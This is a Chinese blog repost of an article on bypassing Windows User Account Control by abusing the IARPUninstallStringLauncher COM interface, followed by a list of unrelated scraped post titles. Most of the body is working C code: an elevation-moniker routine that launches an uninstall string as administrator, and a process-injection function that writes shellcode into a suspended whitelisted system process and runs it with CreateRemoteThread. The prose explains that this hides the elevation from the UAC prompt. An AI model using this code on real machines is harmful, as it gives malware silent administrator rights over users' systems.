巧用COM接口IARPUninstallStringLauncher绕过UAC
来源:互联网 发布:java中dao怎么写 编辑:程序博客网 时间:2024/06/08 14:13
巧用COM接口IARPUninstallStringLauncher绕过UAC
http://www.freebuf.com/articles/system/116611.html
编码实现绕过UAC的功能
核心提权代码
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void ** ppv){BIND_OPTS3 bo;WCHAR wszCLSID[50];WCHAR wszMonikerName[300];StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0])); HRESULT hr = StringCchPrintf(wszMonikerName, sizeof(wszMonikerName)/sizeof(wszMonikerName[0]), L"Elevation:Administrator!new:%s", wszCLSID);if (FAILED(hr))return hr;memset(&bo, 0, sizeof(bo));bo.cbStruct = sizeof(bo);bo.hwnd = hwnd;bo.dwClassContext = CLSCTX_LOCAL_SERVER;return CoGetObject(wszMonikerName, &bo, riid, ppv);}int _tmain(int argc, _TCHAR* argv[]){CLSID clsid;IID iid;LPVOID ppv = NULL;HRESULT hr;PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait pfn_LaunchUninstallStringAndWait = NULL;PFN_IARPUninstallStringLauncher_Release pfn_IARPUninstallStringLauncher_Release = NULL;if (IIDFromString(L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}", &clsid) ||IIDFromString(L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}", &iid))return 0;CoInitialize(NULL);hr = CoCreateInstanceAsAdmin(NULL, clsid, iid, &ppv);if (SUCCEEDED(hr)){pfn_LaunchUninstallStringAndWait = (PFN_IARPUninstallStringLauncher_LaunchUninstallStringAndWait)(*(DWORD*)(*(DWORD*)ppv + 12));pfn_IARPUninstallStringLauncher_Release = (PFN_IARPUninstallStringLauncher_Release)(*(DWORD*)(*(DWORD*)ppv + 8));if (pfn_LaunchUninstallStringAndWait && pfn_IARPUninstallStringLauncher_Release){pfn_LaunchUninstallStringAndWait((LPVOID*)ppv, 0, L"{18E78D31-BBCC-4e6f-A21D-0A15BBC62D49}", 0, NULL);pfn_IARPUninstallStringLauncher_Release((LPVOID*)ppv);}}CoUninitialize();return 0;}
为什么呢?因为执行该提权代码宿主的身份是不可信的,所以我们需要想办法让这段代码在windows的白名单程序中运行.所以很直接的会想到将这段代码注入到诸如计算器,记事本,桌面等等程序中去执行,这样就不会弹出UAC框了。
将提权代码转换为shellcode并注入到白名单程序中执行
关键代码:
BOOL BypassUacWithInject(LPTSTR lpExe){HMODULE hModule = GetModuleHandle(NULL);TCHAR cAppName[MAX_PATH] = {0};STARTUPINFO si;PROCESS_INFORMATION pi;LPVOID lpMalwareBaseAddr;LPVOID lpNewVictimBaseAddr;HANDLE hThread;DWORD dwExitCode;BOOL bRet = FALSE;lpMalwareBaseAddr = g_ByPassUac;AddUninstallItem(lpExe);GetSystemDirectory(cAppName, MAX_PATH);_tcscat(cAppName, InjectTarget);ZeroMemory(&si, sizeof(si));si.cb = sizeof(si);ZeroMemory(&pi, sizeof(pi));if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,NULL, NULL,&si, &pi) == 0){return bRet;}lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess,NULL,SizeOfBypassUac,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if (lpNewVictimBaseAddr == NULL){return bRet;}WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, (LPCVOID)lpMalwareBaseAddr, SizeOfBypassUac, NULL);hThread = CreateRemoteThread(pi.hProcess, 0, 0, (LPTHREAD_START_ROUTINE)lpNewVictimBaseAddr, NULL, 0, NULL);WaitForSingleObject(pi.hThread, INFINITE);GetExitCodeProcess(pi.hProcess, &dwExitCode);TerminateProcess(pi.hProcess, 0);DeleteUninstallItem();return bRet;}
0 0
- BypassUAC------巧用COM接口IARPUninstallStringLauncher绕过UAC
- 巧用COM接口IARPUninstallStringLauncher绕过UAC
- 巧用COM接口IARPUninstallStringLauncher绕过UAC
- IARPUninstallStringLauncher绕过UAC
- psexec 绕过uac
- BypassUAC------利用PowerShell绕过UAC
- 绕过Win7 UAC 创建高权限进程
- 绕过UAC以管理员身份启动程序
- Vista/Win7中绕过UAC自启动
- vista下开机启动 简单绕过UAC的方法
- vista下开机启动 简单绕过UAC的方法
- 绕过admin 黑客突破微软UAC研究初露成效
- win7下自启动程序如何绕过UAC?
- 绕过admin 黑客突破微软UAC研究初露成效
- vista下开机启动简单绕过UAC的方法
- PowerShell 另类提权,win10测试通过,已绕过UAC!
- 绕过UAC提示以管理员身份运行程序
- 利用sdclt磁盘备份工具绕过UAC用户账户管理
- 计算机网络(六) 网络层---概述
- Array189RotateArray
- Mark!Android最佳的开源库集锦
- 剑指offer 面试题3 二维数组中的查找 java版答案
- 自定义View系列(二) 构造函数
- 巧用COM接口IARPUninstallStringLauncher绕过UAC
- openwrt上LUCI模块配置界面开发框架 ---我的笔记(2.5)
- 跨域、sql注入、xss攻击
- 《C++ Primer》读书笔记-第二章 01 数据的内存表示
- 在公式编辑器中输入破折号的方法
- window.location属性的应用
- HDU 4739 Zhuge Liang's Mines
- 一篇好文,以在迷茫时阅读
- ES6基本语法学习笔记--let与const